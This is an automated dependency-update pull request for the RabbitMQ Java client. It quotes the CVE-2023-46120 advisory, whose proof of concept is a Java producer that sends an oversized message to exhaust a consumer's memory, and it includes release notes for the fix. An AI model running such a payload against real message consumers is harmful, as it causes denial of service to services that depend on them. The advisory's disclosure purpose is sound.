fix(deps): update dependency com.rabbitmq:amqp-client to v5.18.0 [security]

[renovate[bot]]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
com.rabbitmq:amqp-client (source)	5.16.0 -> 5.18.0

GitHub Vulnerability Alerts

CVE-2023-46120

Summary

maxBodyLebgth was not used when receiving Message objects. Attackers could just send a very large Message causing a memory overflow and triggering an OOM Error.

PoC

RbbitMQ

• Use RabbitMQ 3.11.16 as MQ and specify Message Body size 512M (here it only needs to be larger than the Consumer memory)
• Start RabbitMQ

Producer

• Build a String of length 256M and send it to Consumer

package org.springframework.amqp.helloworld;

import org.springframework.amqp.core.AmqpTemplate; import org.springframework.context.ApplicationContext; import org.springframework.context.annotation.AnnotationConfigApplicationContext;

public class Producer { public static void main(String[] args) { ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class); AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class); String s = "A"; for(int i=0;i<28;++i){ s = s + s; System.out.println(i); } amqpTemplate.convertAndSend(s); System.out.println("Send Finish"); } }

#### Consumer
* First set the heap memory size to 128M
* Read the message sent by the Producer from the MQ and print the length

package org.springframework.amqp.helloworld;

import org.springframework.amqp.core.AmqpTemplate; import org.springframework.amqp.core.Message; import org.springframework.context.ApplicationContext; import org.springframework.context.annotation.AnnotationConfigApplicationContext;

public class Consumer {

public static void main(String[] args) {
    ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class);
    AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class);
    Object o = amqpTemplate.receiveAndConvert();
    if(o != null){
        String s = o.toString();
        System.out.println("Received Length : " + s.length());
    }else{
        System.out.println("null");
    }
}

}

#### Results
* Run the Producer first, then the Consumer
* Consumer throws OOM Exception

### Impact
Users of RabbitMQ may suffer from  DoS attacks from RabbitMQ Java client which will ultimately exhaust the memory of the consumer.

---

### Release Notes

<details>
<summary>rabbitmq/rabbitmq-java-client (com.rabbitmq:amqp-client)</summary>

### [`v5.18.0`](https://togithub.com/rabbitmq/rabbitmq-java-client/releases/tag/v5.18.0)

[Compare Source](https://togithub.com/rabbitmq/rabbitmq-java-client/compare/v5.17.1...v5.18.0)

### Changes between 5.17.0 and 5.18.0

This is a minor release with usability improvements and dependency upgrades. It is compatible with 5.17.x. All users of the 5.x.x series are encouraged to upgrade.

Inbound message size is now enforced, with default limit being 64 MiB.

Thanks to [@&#8203;JHahnHRO](https://togithub.com/JHahnHRO) and Sérgio Faria ([@&#8203;sergio91pt](https://togithub.com/sergio91pt)) for their contribution.

#### Add ability to specify maximum message size

GitHub issue: [#&#8203;1062](https://togithub.com/rabbitmq/rabbitmq-java-client/issues/1062)

#### Do not confirmSelect more than once per channel

GitHub PR: [#&#8203;1057](https://togithub.com/rabbitmq/rabbitmq-java-client/issues/1057)

#### Make RpcClient (Auto)Closeable

GitHub issue: [#&#8203;1032](https://togithub.com/rabbitmq/rabbitmq-java-client/issues/1032)

#### Bump dependencies

GitHub issue: [#&#8203;999](https://togithub.com/rabbitmq/rabbitmq-java-client/issues/999)

### Dependency

#### Maven

```xml
<dependency>
  <groupId>com.rabbitmq</groupId>
  <artifactId>amqp-client</artifactId>
  <version>5.18.0</version>
</dependency>

Gradle

compile 'com.rabbitmq:amqp-client:5.18.0'

v5.17.1

Compare Source

Changes between 5.17.0 and 5.17.1

This is a minor release with a usability improvement. It is compatible with 5.17.0.

Inbound message size is now enforced, with the default limit being 64 MiB.

Add ability to specify maximum message size

GitHub issue: #​1062

v5.17.0

Compare Source

Changes between 5.16.0 and 5.17.0

This is a minor release with bug fixes, usability improvements, and dependency upgrades. It is compatible with 5.16.x. All users of the 5.x.x series are encouraged to upgrade.

Thanks to Nikita Nefedov (@​nikita2206) for his contribution.

Remove hard dependency on Jackson in OAuth 2 support

GitHub PR: #​969

NPE in AbstractMetricsCollector when channel limit is exceeded

GitHub issue: #​944

Report publish failures for the closed channel as well

GitHub PR: #​943

Remove dependency on java.sql.Timestamp

GitHub PR: #​878

Bump dependencies

GitHub issue: #​848

Dependency

Maven

<dependency>
  <groupId>com.rabbitmq</groupId>
  <artifactId>amqp-client</artifactId>
  <version>5.17.0</version>
</dependency>

Gradle

compile 'com.rabbitmq:amqp-client:5.17.0'

v5.16.1

Compare Source

Changes between 5.16.0 and 5.16.1

This is a minor release with a usability improvement. It is compatible with 5.16.0.

Inbound message size is now enforced, with the default limit being 64 MiB.

Add ability to specify maximum message size

GitHub issue: #​1062

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• [ ] If you want to rebase/retry this PR, check this box

---

This PR has been generated by Mend Renovate. View repository job log here.